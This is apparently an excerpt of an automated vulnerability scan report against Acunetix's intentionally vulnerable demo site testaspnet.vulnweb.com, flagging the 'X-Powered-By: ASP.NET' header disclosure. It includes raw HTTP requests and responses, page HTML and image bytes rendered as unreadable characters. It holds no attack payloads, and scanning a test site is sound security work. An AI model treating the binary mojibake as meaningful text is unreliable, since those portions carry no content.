vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 324 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/favicon.ico
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 367 bytes.	GET http://testaspnet.vulnweb.com/favicon.ico HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc
Request Body - size: 0 bytes.
Response Header - size: 249 bytes.	HTTP/1.1 200 OK Content-Type: image/x-icon Last-Modified: Thu, 29 May 2008 14:36:35 GMT Accept-Ranges: bytes ETag: "184366599c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:25 GMT Content-Length: 894
Response Body - size: 894 bytes.	h( HHÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿïîý\Uêà&ãÝÛûóóýñ¥ ôõôþäãü@6æàmeìøøþÍÊùààáÖÔú³¯õßàª¦ôÔÒù'ãàãÈÅùÐÍùâáá×Õú²®õ àá©ôÕÓú'äá&äÅÂùäãü3)åáàðêèüðòìëýðààE<éòñþüüÿò à áác[ëÖÔúØÕú_Wë à á à°¬õÿÿÿÿÿÿðïý90æ à ááááá áà>4çõõþÿÿÿÿÿÿÿÿÿÑÎù:2æààááàà:0æÎÌùÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÝÜûðZRê&ã)äVNêòÚØúÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿþþÿñðýäãüâáûðïýþþÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
URL	http://testaspnet.vulnweb.com/images/background.gif
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 387 bytes.	GET http://testaspnet.vulnweb.com/images/background.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/styles.css Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:54 GMT Accept-Ranges: bytes ETag: "9a66e17099c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:25 GMT Content-Length: 144
Response Body - size: 144 bytes.	GIF89a³ÿÿÿ×Ê¹uSxVÍÀº©æÜÏÀ°¢p§v!ù,=0¸8ëÍ»ÿ`(dihª®lë¾p,Ïtmßx®ï¼' BÀ8$½¤rÉl:Ð¨tJZ¯²Aâ0;
URL	http://testaspnet.vulnweb.com/images/comment-after.gif
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 355 bytes.	GET http://testaspnet.vulnweb.com/images/comment-after.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:55 GMT Accept-Ranges: bytes ETag: "2c6507199c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 1957
Response Body - size: 1,957 bytes.	GIF89aôÕÿÿÿ`@õðìðéâøôñíåÝüûùú÷õüúùîåÝúøõ÷ôñðèâóìçòìçòíçõñìóíçøôðíåÞúøöüúúüûúú÷ö÷ôðïéâîåÞöðìù÷õöñìõðëùøõïèâøõñù÷öðéãíäÝ÷õñõñëûûùëâÙøõðùøöîäÝðèãîäÞéÞÕæÚÏíäÞéßÔûúùçÜÒ÷õðöðëçÛÑïéãëáÙëâØçÜÑ!ù,ôÿÀ@Å0 C¢eXDNÅ0}§I¤ôIµ É¨IT>§Çf¶ÕU¢¸\ñ~+Í£Ö¿Öc't^PZYPCKMherF^Nv[Zbxr_\H2fci`¤MY\yUnGhO'VTl{kL[·Wz¬¤T¸dicL¡«¹eT'¹¨}}cLeyR»ÝiÚHâ¼Õr{CªTuËD " ð§@ }þâã°¯à@!PHA½ ª(ÈñGâë80#È@âË1ä~ø~tÒa@cÜ³ ÿ?\|\9r"Ã8#ò<HSâ½0Ê<ÀS2âÏ:ïuÉ¦{â«3#ÐoêÄ¹vßØýIMê!ÚpGÆäHpèI½&(§B·/Ø/oÛ»-ê¬ùç³zµNTêsÑU¤T+kÀ>ÿ%u©àêè«%vÝºé\ è-!(Ç@óæ/Àb¸óä'WN`Áqï$xçÎÝz÷æÒ½/¿~½óñ!ÔcÞ]ùðöâíw¿<}õá·@\|ï]tÓé·wÙÞÖ%Gà~¤À_vöWyåÙÇÿxnÈ¡Ú½ &ÞWñ©HsNG ¢`v8]ÇagÈm(ÞxÛgÞ.vGcw ÞÞN6Bsæ59¢u¨ÓmÇvOòG$!>6Jø¤Vè ÎAWßc¾ér¤g}ê¹GÊ@j(n`è¢"Z¨£2zh¤lÐ(¥ à(¢P V ª¢ àÁ£¤ Ð©¦> )£Bðª¬®bJ«£Æz(¨"zjªFJë¤²v°ºé¢\ª)±Úè«z`)«ª:;ë©Ø P®· [êµÖpê±v:ÿì²âB@n¯Ý.ún¥Ýþo¦ÃÊêÁ´ÏÚï¡ÎvÊ-·¤",µ¬Z+ªB+î¿v ì©p°ýrªª >à@²Ç DÁ 4ðqÈ&G2Ê0; sÐ\|2Í!¯ü±¸òÉ${\sÉ&2È¯\rÍ(\|³Ì<Ë¬²Ð2,´É(\4ÏGGÝsÖE'òÔ]m2Ï-{ýsÓI{ítÌ?kÍsÏ./}4ÍLÓ}rÕã,wÖc¿uÊs×\õÇ k=¶Ç=/M3ÑFs]³ÏN'ÎôÌ=K=òØJ¿,5Ì)û\|òÈ>®óÛ3#½sæ.ÍxèCK]¸ì6¿>ÿ2â·5Ø"çùÍD³8Ö\ßMrñ6ã4Ú8yÎ-OsãxCÝúÒ9gï5Ç0\|?Þ~øãÏ@æþ÷°/>øò£úð¯o~ùÞ£ÿÿüß÷È÷>óáO\|üc0ÈoLÿ8?F0\| ìðyðõÛß÷H?V°ôà ý§Bï±/üúX ? ^0tßûØBê/¬¡pÞì ;?!Öð´!ÿFpD"±$_ yÈÁþmò{áÈ?& P}¡o¨Dï <8Ãæÿõã HÀü8 ü1-(@ ?þ\|d9I@úqt¤#% HN.R$#)Iò$(¹IEle IÉJþÀ þ¨IEÒÒ¶4dvIËT:2\eILRLd)Jj>ó&%IyÌJ2©ü¥/ÅùÈVÆ2üc3yËcÀÎ´%*·ÍQ¤´¥3yyMEjSéÌä2½¹OWjð<e:}II~ §.]ùÍ[º²¦¬e.CIH`N²Ë4¤HÑYÈ.¤³lh IªÊ\6ÂòL=öHSÒã¦8Í©NwÊÓúô§@ ªPJÔ¢õ¨HMªRÊÔ¦:õ©PêRQ (xjM·ÊÕ®zõ«` «XÇJÖ²õ¬hM«Z×ÊÖ¶ºõp«\çJ×®ÀxAfZ×¾úõ¯ ¬`KØÂö°kf0Ø@¬d'KÙÊZö²ÍìVððU³ hGKÚÒÖ¯ìiWËÚÖºöµ°ìgcKÛÚÚö¶¸ujû;
URL	http://testaspnet.vulnweb.com/images/comment-before.gif
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
